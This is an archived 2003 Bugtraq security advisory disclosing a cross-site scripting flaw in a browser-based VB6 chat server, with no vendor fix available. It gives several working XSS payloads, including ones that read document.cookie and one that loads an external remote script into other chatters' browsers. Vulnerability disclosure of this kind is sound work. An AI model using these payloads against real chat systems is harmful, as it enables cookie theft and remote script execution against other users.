Chatserver - XSS ( push )

From: morning_wood (se_cur_ity_at_hotmail.com)
Date: 08/10/03

  • Next message: Matt Zimmerman: "[SECURITY] [DSA-361-2] New kdelibs-crypto packages fix multiple vulnerabilities"
    To: <bugtraq@securityfocus.com>
    Date: Sat, 9 Aug 2003 16:19:12 -0700
    
    

    ------------------------------------------------------------------
              - EXPL-A-2003-019 exploitlabs.com Advisory 019
    ------------------------------------------------------------------
                                   -= CHAT SERVER =-

    exploitlabs
    Aug 08, 2003

    Product:
    --------
    Chat Server ( by author of "Sleuth 1.4" )
    http://sandsprite.com/codestuff.asp

    download and vb6 sources:

    http://sandsprite.com/CodeStuff/chatserver.zip

    Vunerability(s):
    ----------------
    XSS ( push through )

    Description of product:
    -----------------------
    Web browser based chatserver similar
     to the Magma Chatserver that powers huge
     sights like chatropolis.com. This will show
     just how they can stream text into a browser
     and display it realtime. Have an unlimited
     number of people all chatting at once using
     only their web browsers :) pretty neat

    chatserver is an server application
    and runs by default on port 80

    note: chatropolis.com is not affected

    VUNERABILITY / EXPLOIT
    ======================

    XSS is able to be "pushed" from one
    chatter to another, with the results being
    "forced" into any other chatters browser
    for execution.

    examples:

    <script>alert("You are vunerable to xss ")</script>

    <SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SC
    RIPT>

    <iframe src="http://whatismyip.com"></iframe>

    <script language="JavaScript"
    src="http://www.astalavista.com/backend/news.js"
    type="text/javascript"></script>

    note: the last one is remote code.

    the vunerability exists in the sample provided and after compiling from
    the provided sources.

    Local:
    ------
    yes

    Remote:
    -------
    yes

    Vendor Fix:
    -----------
    No fix on 0day

    Vendor Contact:
    ---------------
    Concurrent with this advisory
    dzzie@yahoo.com

    Credits:
    --------

    Donnie Werner
    morning_wood@e2-labs.com
    http://e2-labs.com
    http://exploitlabs.com

    original advisory may be obtained at
    http://exploitlabs.com/files/advisories/EXPL-A-2003-019-chatserver.txt


  • Next message: Matt Zimmerman: "[SECURITY] [DSA-361-2] New kdelibs-crypto packages fix multiple vulnerabilities"

    Relevant Pages